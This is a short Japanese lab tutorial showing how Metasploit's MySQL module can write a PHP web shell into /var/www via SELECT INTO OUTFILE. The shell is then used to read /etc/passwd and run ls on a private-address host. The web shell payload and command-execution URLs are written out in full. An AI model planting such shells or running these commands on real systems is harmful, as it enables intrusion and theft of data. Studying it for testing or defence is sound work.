Shikata Ga Nai

Private? There is no such things.

MetasploitでMySQLを介してシステムを操作してみた

Hello there, ('ω')ノ

 

あらかじめ下記のディレクトリが書き込み可能であることが前提でして。

 / var / www

 

そこにSQLでファイルを作成するSQL文を設定して。

 set SQL "select \"<?php phpinfo()?>\" INTO OUTFILE \"/var/www/a.php\""

 

f:id:ThisIsOne:20200625124814p:plain

 

ファイルができていることと中身を確認しておいて。

 

f:id:ThisIsOne:20200625124317p:plain

 

ブラウザでファイルへアクセスするとファイルに書き込んだモジュールが実行されて。

 

f:id:ThisIsOne:20200625124144p:plain

 

今度は、cmパラメータにシステムコマンドを受け取って。

PHPのシステム関数で実行できるファイルを作成することに。

 set SQL "select \"<?php system($_GET[cm]);?>\" INTO OUTFILE \"/var/www/b.php\""

 

f:id:ThisIsOne:20200625155437p:plain

 

下記のようにシステムコマンドをパラメータとしてb.phpファイルに指定すると。

 http://10.4.131.3/b.php?cm=cat  /etc/passwd

 

/ etc / passwdファイルの内容が画面に出力され。

リモートコードが実行されたことが確認できて。

 

f:id:ThisIsOne:20200625140630p:plain

 

ならば、こんなことも。
 http://10.4.131.3/b.php?cm=ls

 

f:id:ThisIsOne:20200625155816p:plain

 

Best regards, (^^ゞ